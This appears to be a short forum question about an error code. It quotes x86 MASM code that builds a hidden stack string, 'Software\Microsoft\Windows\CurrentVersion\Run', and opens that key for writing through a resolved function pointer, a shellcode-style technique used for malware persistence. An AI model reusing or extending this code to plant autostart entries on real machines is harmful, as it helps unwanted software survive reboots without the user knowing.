RegOpenKeyExA returns error 998 ERROR_NOACCESS in MASM
`; Set hKey with RegOpenKeyExA
Xor Ecx, Ecx
Lea Ebx, [Ebp – 52H]
Push Ebx ; phkResult
Push 2H ; samDesired = KEY_SET_VALUE
Push Ecx ; ulOptions = NULL
Mov Cl, 6EH
Push Ecx
Push 75525C6EH
Push 6F697372H
Push 6556746EH
Push 65727275H
Push 435C7377H
Push 6F646E69H
Push 575C7466H
Push 6F736F72H
Push 63694D5CH
Push 65726177H
Push 74666F53H
Push Esp ; lpSubkey
Push 80000001H ; hKey = HKEY_CURRENT_USER
Mov Eax, [Ebp – 34H]
Call Eax ; Call RegOpenKeyEx
Lea Edi, [Ebp – 52H]